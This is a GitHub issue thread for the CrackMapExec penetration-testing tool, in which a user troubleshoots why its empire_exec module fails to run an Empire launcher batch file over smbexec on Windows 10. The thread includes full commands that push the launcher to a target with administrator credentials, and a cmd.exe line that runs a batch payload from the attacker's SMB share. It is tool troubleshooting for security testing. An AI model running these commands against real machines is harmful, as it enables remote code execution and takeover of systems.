### ISSUE TITLE
Empire launcher .bat wont run

### ISSUE THREAD

**Issue by Kaicastledine** [byt3bl33d3r/CrackMapExec#233] opened 2018-02-14 17:25 UTC
## Steps to reproduce

cme --verbose smb 192.168.225.110 -u Administrator -p Empire123! --local-auth -M empire_exec -o LISTENER=test --exec-method smbexec

## CME verbose output (using the --verbose flag)
![image](https://user-images.githubusercontent.com/11678433/36218212-956ea550-11ab-11e8-9df6-d20032d6f286.png)

## CME Version (cme --version)
 4.0.1dev 

## OS
Kali linux rolling 2018
## Target OS
Windows 10 

## Detailed issue explanation

Can confirm process is run on target machine 
![image](https://user-images.githubusercontent.com/11678433/36218304-cb84b9f4-11ab-11e8-8f40-e509de3877f1.png)

.bat file works if run manually (grabbed from /tmp/cme_hosted)

**Comment by Kaicastledine** [comment] 2018-02-14 17:26
Issue with CME SMB File hosting ?

**Comment by Kaicastledine** [comment] 2018-02-15 13:06
So I've done a few tests and it seems there is an issue with the smb server bat file hosting.

I've tested all bat files generated both multi/launcher and changed to windows/launcher_bat which if ran manually on each machine work fine.

Running then with the same commands via cmd however has some interesting results
(Using SMB share setup)

- Windows 10 enterprise blocks Guest access to shares so wont run the batch file remotely
- Windows 10 pro runs but have to use cmd.exe /c "\\serverIP\share\batchfile.bat"
(otherwise you get "input too long error"

When trying to execute on either version of windows 10, CME creates the smb server and launches the bat file command off the share but it doesn't run. I've manually to try grab the file or see that externally I can see the smb server but it doesn't look like it's hosting or running any file.

I've changed the random gen names to static values so the share/batch file name is set.

**Comment by Kaicastledine** [comment] 2018-02-15 13:07
I've tried to host the batch file with a share and then tried to execute via cme with   -x however fails because port 445 is in in use.

Seems if port 445 is in use the smb server does not debug this out also when launching a empire launcher.

**Comment by Kaicastledine** [comment] 2018-02-16 09:06
Anyone got any ideas I can try ?

**Comment by Kaicastledine** [comment] 2018-02-16 09:29
Seems to be an issue when running 
`cme smb -u admin -p admin -M empire_exec -o LISTENER=Test -exec-method smbexec`

Can run via WMIC no issues

![image](https://user-images.githubusercontent.com/11678433/36301184-d5535dae-12fb-11e8-9b45-42de413f281a.png)

**Comment by aj-cgtech** [comment] 2018-02-20 13:10
Have you tried running in verbose mode, just to see it it's throwing an exception.

cme --verbose smb -u admin -p admin -M empire_exec -o LISTENER=Test -exec-method smbexec

**Comment by Kaicastledine** [comment] 2018-02-28 10:23
Hello, yes you'll find the verbose output as the top comment with photo.

I can see it executing the commands on the target but cannot confirm it's pulling the .bat to execute at all. ( using smbexec)

I was hoping by setting the name of the file I could try pull the bat file. I've got a feeling it's an issue with the smb file hosting on the attacking server with cme.

The commands run without issue or exception just doesn't run the bat file via the created service.

**Comment by byt3bl33d3r** [comment] 2018-03-04 03:25
Duplicate of #192.

Closing

**Closed by byt3bl33d3r** 2018-03-04 03:25 UTC
Labels: duplicate
